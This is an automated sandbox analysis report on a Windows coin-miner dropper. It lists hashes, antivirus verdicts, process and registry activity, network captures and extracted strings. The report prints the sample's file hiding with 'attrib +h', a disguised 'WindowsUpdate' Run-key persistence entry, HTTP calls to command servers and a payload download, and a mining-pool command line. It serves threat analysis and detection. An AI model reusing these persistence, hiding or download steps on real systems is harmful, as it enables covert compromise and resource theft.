Analysis Date2014-11-18 18:10:09
MD5559334a0652c9a9515646d53f162c74a
SHA1af776b529d366b8ede32cdf89f6b6c9ee244cf4d

Static Details:

File typePE32 executable for MS Windows (console) Intel 80386 32-bit
Section.text md5: f02ff8e6b5f848005e0ea8c2bb1c9a7f sha1: 6e63ad80830fd43cadf219f01ebe39a25b063fb9 size: 167424
Section.rdata md5: 07617105c2182f927bfbe735b8a7d13d sha1: 4bba9347f5e5990f144a51f34afe19c580336496 size: 49664
Section.data md5: c8dd6458664ca6f20ea59ddc76c5c0ae sha1: 7b53f1898dca804c2ecdf3a97b10b39e7074f97f size: 7680
Section.rsrc md5: 63a978a93afb85b47b650b22380a3ca0 sha1: e4efdf708da64a865afd2afab95c46f202058e90 size: 512
Section.reloc md5: d63c69f7800df47562f0e41d8fc6967f sha1: 7fac03ce02844bcce093d9f0920c39ea61de907f size: 9728
Timestamp2014-11-12 07:24:29
Pdb pathC:\Users\MrUnzO\Documents\Visual Studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
PackerMicrosoft Visual C++ ?.?
PEhash412e25cc7d578a39c78d09c44cc66edd26000fb5
IMPhash524aa3c9404bd6078c3abcbeff12bd88
AV360 SafeTrojan.Generic.12136029
AVAd-AwareTrojan.Generic.12136029
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Heuristic-KPP!Eldorado
AVAvira (antivir)no_virus
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Generic.12136029
AVEset (nod32)Win32/CoinMiner.VW
AVFortinetW32/CoinMiner.VW!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Generic.12136029
AVGrisoft (avg)Win32/DH{gRI2A2I}
AVIkarusTrojan.Win32.CoinMiner
AVK7no_virus
AVKasperskyTrojan-Dropper.Win32.Sysn.aprg
AVMalwareBytesno_virus
AVMcafeeNew Malware.ca
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVNormanTrojan.Generic.12136029
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"
Creates ProcessC:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h ".."

Creates Processattrib +h ".."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"

Creates Processattrib +h "config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "."

Creates Processattrib +h "."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"

Creates Processattrib +h "C:\malware.exe"

Process
↳ C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate ➝
"C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe" -autorun\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Application Data\Windows\config.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h ".."
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "."
Creates MutexLocal\$myprogram$
Winsock DNSh4ck3r4k3.ddns.net
Winsock DNSh4ck3r.info
Winsock DNSge.tt
Winsock URLhttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
Winsock URLhttp://ge.tt/api/1/files/7ZgNjE32/0/blob?download
Winsock URLhttp://H4CK3R.INFO/x.php?ID=0&V=3&cpu=2
Winsock URLhttp://H4CK3R.INFO/c.php?V=3&ID=0&cpu=2

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h ".."

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ attrib +h "config.ini"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ attrib +h "."

Process
↳ attrib +h "C:\malware.exe"

Network Details:

DNSh4ck3r.info
Type: A
184.168.221.26
DNSh4ck3r4k3.ddns.net
Type: A
8.23.224.90
DNSge.tt
Type: A
54.195.252.180
HTTP GEThttp://h4ck3r.info/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r.info/c.php?V=3&ID=0&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r.info/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ge.tt/api/1/files/7ZgNjE32/0/blob?download
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1036 ➝ 8.23.224.90:80
Flows TCP192.168.1.1:1037 ➝ 54.195.252.180:80

Raw Pcap
0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3326 6370753d 32204854 54502f31   V=3&cpu=2 HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6834636b 33722e69 6e666f0d 0a436f6e   h4ck3r.info..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3326 6370753d 32204854 54502f31   V=3&cpu=2 HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6834636b 3372346b 332e6464 6e732e6e   h4ck3r4k3.ddns.n
0x000000c0 (00192)   65740d0a 436f6e6e 65637469 6f6e3a20   et..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a       Keep-Alive....

0x00000000 (00000)   47455420 2f632e70 68703f56 3d332649   GET /c.php?V=3&I
0x00000010 (00016)   443d3026 6370753d 32204854 54502f31   D=0&cpu=2 HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6834636b 33722e69 6e666f0d 0a436f6e   h4ck3r.info..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a       ive....ive....

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3326 6370753d 32204854 54502f31   V=3&cpu=2 HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6834636b 33722e69 6e666f0d 0a436f6e   h4ck3r.info..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a       ive....ive....

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3326 6370753d 32204854 54502f31   V=3&cpu=2 HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6834636b 3372346b 332e6464 6e732e6e   h4ck3r4k3.ddns.n
0x000000c0 (00192)   65740d0a 436f6e6e 65637469 6f6e3a20   et..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a       Keep-Alive....

0x00000000 (00000)   47455420 2f617069 2f312f66 696c6573   GET /api/1/files
0x00000010 (00016)   2f375a67 4e6a4533 322f302f 626c6f62   /7ZgNjE32/0/blob
0x00000020 (00032)   3f646f77 6e6c6f61 64204854 54502f31   ?download HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   67652e74 740d0a43 6f6e6e65 6374696f   ge.tt..Connectio
0x000000d0 (00208)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000e0 (00224)   0a                                    .


Strings
.
....
.
..
.
.
..
.
...
#
$
%&$
'
(
-
$
./$
.
 
.
  
-
-1
+-0-E-
-0
00-+ 
  
0
0.
- 
000..
u
                                 
/../
/..\
\../
\..\
- abort() has been called
af-za
af-ZA
america
american
american english
american-english
April
ar-ae
ar-AE
ar-bh
ar-BH
ar-dz
ar-DZ
ar-eg
ar-EG
ar-iq
ar-IQ
ar-jo
ar-JO
ar-kw
ar-KW
ar-lb
ar-LB
ar-ly
ar-LY
ar-ma
ar-MA
ar-om
ar-OM
ar-qa
ar-QA
ar-sa
ar-SA
ar-sy
ar-SY
ar-tn
ar-TN
ar-ye
ar-YE
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
australian
-autorun
az-az-cyrl
az-AZ-Cyrl
az-az-latn
az-AZ-Latn
BCONOUT$
be-by
be-BY
belgian
BENG
bg-bg
bg-BG
BGBR
BLC_ALL
bn-in
bn-IN
BR6002
britain
bs-ba-latn
bs-BA-Latn
ca-es
ca-ES
canadian
CCHN
CCHS
CCHT
CCZE
CDEA
CDEC
CDEL
CDES
CENA
CENB
CENC
CENG
CENI
CENJ
CENL
CENS
CENT
CENU
CENZ
CESA
CESB
CESC
CESD
CESE
CESF
CESG
CESH
CESI
CESL
CESM
CESN
CESO
CESR
CESS
CESU
CESV
CESY
CESZ
CFRB
CFRC
CFRL
CFRS
CGBR
china
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
CHKG
CITS
CKAKA
CKOR
CNLB
CNLD
CNON
CNOR
CNZL
combase.dll
CPRI
CPTB
- CRT not initialized
cs-cz
cs-CZ
CSVF
CSVK
CTTO
CUSA
cy-gb
cy-GB
CZAF
czech
CZHH
CZHI
da-dk
da-DK
dddd, MMMM dd, yyyy
de-at
de-AT
December
de-ch
de-CH
de-de
de-DE
de-li
de-LI
de-lu
de-LU
div-mv
div-MV
DOMAIN error
dutch-belgian
Eccs
el-gr
el-GR
emscoree.dll
en-au
en-AU
en-bz
en-BZ
en-ca
en-CA
en-cb
en-CB
en-gb
en-GB
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
en-ie
en-IE
en-jm
en-JM
en-nz
en-NZ
en-ph
en-PH
en-tt
en-TT
en-us
en-US
en-za
en-ZA
en-zw
en-ZW
es-ar
es-AR
es-bo
es-BO
es-cl
es-CL
es-co
es-CO
es-cr
es-CR
es-do
es-DO
es-ec
es-EC
es-es
es-ES
es-gt
es-GT
es-hn
es-HN
es-mx
es-MX
es-ni
es-NI
es-pa
es-PA
es-pe
es-PE
es-pr
es-PR
es-py
es-PY
es-sv
es-SV
es-uy
es-UY
es-ve
es-VE
et-ee
et-EE
eu-es
eu-ES
fa-ir
fa-IR
February
fi-fi
fi-FI
- floating point support not loaded
fo-fo
fo-FO
fr-be
fr-BE
fr-ca
fr-CA
fr-ch
fr-CH
french-belgian
french-canadian
french-luxembourg
french-swiss
fr-fr
fr-FR
Friday
fr-lu
fr-LU
fr-mc
fr-MC
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
gl-es
gl-ES
great britain
gu-in
gu-IN
         (((((                  H
he-il
he-IL
HH:mm:ss
hi-in
hi-IN
holland
hong-kong
hr-ba
hr-BA
hr-hr
hr-HR
hu-hu
hu-HU
hy-am
hy-AM
id-id
id-ID
- inconsistent onexit begin-end variables
irish-english
is-is
is-IS
italian-swiss
it-ch
it-CH
it-it
it-IT
ja-jp
ja-JP
January
July
June
ka-ge
ka-GE
@KAKA
kernel32.dll
kk-kz
kk-KZ
kn-in
kn-IN
kok-in
kok-IN
ko-kr
ko-KR
ky-kg
ky-KG
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
lt-lt
lt-LT
lv-lv
lv-LV
March
Microsoft Visual C++ Runtime Library
mi-nz
mi-NZ
mk-mk
mk-MK
ml-in
ml-IN
MM/dd/yy
mn-mn
mn-MN
Monday
mr-in
mr-IN
ms-bn
ms-BN
ms-my
ms-MY
mt-mt
mt-MT
nb-no
nb-NO
new-zealand
nl-be
nl-BE
nl-nl
nl-NL
nn-no
nn-NO
norwegian
norwegian-bokmal
norwegian-nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ns-za
ns-ZA
(null)
October
pa-in
pa-IN
pl-pl
pl-PL
portuguese-brazilian
pr china
pr-china
Program: 
<program name unknown>
pt-br
pt-BR
pt-pt
pt-PT
puerto-rico
- pure virtual function call
quz-bo
quz-BO
quz-ec
quz-EC
quz-pe
quz-PE
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
R6034
ro-ro
ro-RO
runtime error 
Runtime Error!
ru-ru
ru-RU
sa-in
sa-IN
Saturday
se-fi
se-FI
se-no
se-NO
September
se-se
se-SE
SING error
sk-sk
sk-SK
slovak
sl-si
sl-SI
sma-no
sma-NO
sma-se
sma-SE
smj-no
smj-NO
smj-se
smj-SE
smn-fi
smn-FI
sms-fi
sms-FI
Software\Microsoft\Windows\CurrentVersion\Run
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
sq-al
sq-AL
sr-ba-cyrl
sr-BA-Cyrl
sr-ba-latn
sr-BA-Latn
sr-sp-cyrl
sr-SP-Cyrl
sr-sp-latn
sr-SP-Latn
%s%s
%s%s%s
Sunday
sv-fi
sv-FI
sv-se
sv-SE
swedish-finland
swiss
sw-ke
sw-KE
syr-sy
syr-SY
ta-in
ta-IN
te-in
te-IN
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
th-th
th-TH
Thursday
TLOSS error
tn-za
tn-ZA
trinidad & tobago
tr-tr
tr-TR
tt-ru
tt-RU
Tuesday
uk-ua
uk-UA
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UNICODE
united-kingdom
united-states
update.zip
ur-pk
ur-PK
USER32.DLL
UTF-16LE
UTF-8
uz-uz-cyrl
uz-UZ-Cyrl
uz-uz-latn
uz-UZ-Latn
vi-vn
vi-VN
Wednesday
WindowsUpdate
xh-za
xh-ZA
zh-chs
zh-CHS
zh-cht
zh-CHT
zh-cn
zh-CN
zh-hk
zh-HK
zh-mo
zh-MO
zh-sg
zh-SG
zh-tw
zh-TW
zu-za
zu-ZA
                          
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
000<0X0d0p0
0$0,040<0D0L0T0\0d0l0t0|0
0(0=0B0]0b0
0 0@0L0l0x0
0!010A0Q0]0g0s0
0(040@0L0X0d0p0|0
0!040G0p0{0
0123456789abcdefABCDEF
0123456789abcdefghijklmnopqrstuvwxyz
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0 181B1^1e1k1y1
0>1N1S1_1o1t1
;"<(<,<0<4<
040;0k0
$040D0T0d0
040P0q0
= =$=(=,=0=4=8=<=@=D=H=L=P=T=
? ?$?(?,?0?4?8?<?@?L?P?T?X?\?`?d?h?l?p?t?x?|?
060I0Q0Z0h0n0x0
= =(=0=8=<=D=X=t=x=
< <(<0<8<@<H<P<X<`<h<p<x<
= =(=0=8=@=H=P=X=`=h=p=x=
; ;(;0;8;@;H;P;X;`;h;p;x;
: :(:0:8:@:H:P:X:`:h:p:x:
0e0l0t0
:,:0:H:L:d:h:
>$>0><>H>T>`>l>x>
0I1[1m1
0K1L2\2m2u2
<0|m<9
;0;P;\;x;
|$0 s9Vj
101<1X1x1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1
1$1,141<1D1L1T1\1d1l1t1|1
1)1<1F1K1Q1X1b1|1
1-1?1Q1c1u1
1-171=1O1Y1_1z1
1!191W1
1(1L1T1\1d1l1t1|1
1 1N1a1o1
1"2~2 4%4
1 2F2R2]2d2
1d2r2|2`3|3
1h2/3F3a3y3
=%=1===I=l=u=~=
1L2P2`2d2h2l2t2
1Q3^3i3|3
1#QNAN
1S2Y2n2{2
1#SNAN
20A0`0
2 2$2(2,2
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2h2l2p2t2x2|2
2 2&2.23292A2F2L2T2Y2_2g2l2r2z2
2$2,242<2D2L2T2\2d2l2t2|2
2$2/272
2"262C2H2
2-3D3~3
2$4V4u4
252Q2k2
283C3I3
:+;2;:;C;`;g;o;x;
2D2h2t2|2
2\<`<d<h<
2e3t3}3
=*=2=@=E=T=
<2<H<P<
:2<l>p>t>x>|>
<#<2<><M<Y<
3%3*30383=3C3K3P3V3^3c3i3q3v3|3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3"3)3.333F3Y3y3~3
3$3,343<3D3L3T3\3d3l3t3|3
3$3,3D3H3P3d3l3t3|3
3+3?3E3
3 3$3K3W3{3
3$34383H3L3P3T3\3t3
3%363<3J3P3l3
3)4/454;4A4G4N4U4\4c4j4q4x4
3$4(4L4X<\<`<d<\?d?l?t?|?
:*:3:9:e:{:
;,;3;;;@;D;H;q;
;+<3<N<]<v<	=
3Q4Z475B5U5i5+646@7I758
3T4X4\4`4d4h4l4p4t4x4
40565<5B5H5N5U5\5c5j5q5x5
414;4d4l4u4~4
425<5I5U5f5o5
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4
4!4&4/444:4B4H4V4d4k4x4
4$4,444<4D4L4T4\4d4l4t4|4
4 444<4D4
4$44484H4L4T4l4|4
4(4@4c4w4
4 4&4D4Y4
4-4<4L4l4
4(484@4L4l4x4
4 4B495@5
4"4L4R4_4k4
4$4M4R4g4v4
4%515<6p6
4%5?5H5
4$5D5P5p5|5
:-:4:9:C:N:U:\:f:y:
=!=,=4=:=F=T=e=k=q=x=
4G5Y5k5}5
> >(>,>4>H>h>
4N5T5}5
4p6x6~6
5+505;5E5[5|5
5,525<5V5l5
5 545C5w5
5%5*50565D5J5f5p5v5
5(5,50585P5`5d5t5x5
5$5,545<5D5L5T5\5d5l5t5|5
555I5T5
5"6:6i6
5(6<6L6\6h6p6
5'6,6l6z6
5!6G6e6l6p6t6x6|6
?)?.?5?:?b?k?}?
=	>(>5>=>F>T>Z>d>n>
5q7w7|7
5Z7s7x:
6064686<6@6H6L6P6X6\6`6d6h6p6t6x6
636@6L6\6b6s6
6$6,646<6D6L6T6\6d6l6t6|6
6$6,646<6D6L6T6\6d6l6t6x6
6%6/686
6(6;6O6Y6b6s6
6 7(7.7=7q7|7
697>7G7L7U7Z7g7
6G6|6V7f7
6J7U7p7w7|7
6P6]6q6
;6;Q;^;o;
<6=Q=v=
6Z7j7v7
738<8D8^8}8
7 7(70787@7H7P7X7`7h7p7x7
7$7,747<7D7L7T7\7d7l7t7|7
7$7(7.727C7K7
7 7$7(7,70747
7 7$7(7,74787<7@7D7L7P7X7\7`7d7l7p7t7x7
7(7H7h7
7!;);/;8;
787D7L7d7l7
7B7M7_7o7}7
;&;7;U;\;y;
>8>\>|>
81f1n1v1~1
84888P8T8l8p8
848e8r8{8
8 8(80888@8H8P8X8`8h8p8x8
8$8,848<8D8
8$8,848<8D8L8T8\8d8l8t8|8
8$8+8;8A8G8O8U8[8c8i8o8w8
8(8=8H8O8j8y8
8 8$8n8t8x8|8
8$8,8P8`8l8t8
8:8B9L9f9x9
8(8Y8q8
8+939J9h9
8 9$9(9,9094989<9@9D9H9L9P9T9
8/9G9`9<:
<8bunz8
8D8h8{8
<8<@<D<`<h<l<
:8;D;I;
? ?,?8?D?P?\?h?t?
8@:F:l:r:
:8:@:H:P:T:\:p:
<(<8<H<X<h<x<
;(;8;H;X;h;x;
=$=(=8=<=L=P=`=d=t=x=
90949L9P9h9l9
90D0^0v0
90H0V0
9$919;9K9
9(949@9L9X9d9p9t;x;|;
9 9(90989@9H9P9X9`9h9p9x9
9 9(9,949H9P9d9l9t9|9
9$9W9f9
9,:F:l:
<9=H=V=
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
address family not supported
address_family_not_supported
address in use
address_in_use
address not available
address_not_available
ADVAPI32.dll
=(=[=a=g=n=v=
:%:A:I:N:z:
already connected
already_connected
 -a m7mhash -o stratum+tcp://xmg.suprnova.cc:7128 -u MrUnzO.nb -p x
AreFileApisANSI
argument list too long
argument out of domain
</assembly>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<at-<rt"<wt
attrib +h "
.?AUctype_base@std@@
August
.?AUIBindStatusCallback@@
.?AUIUnknown@@
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$ctype@D@std@@
.?AVDownloadStatus@@
.?AVerror_category@std@@
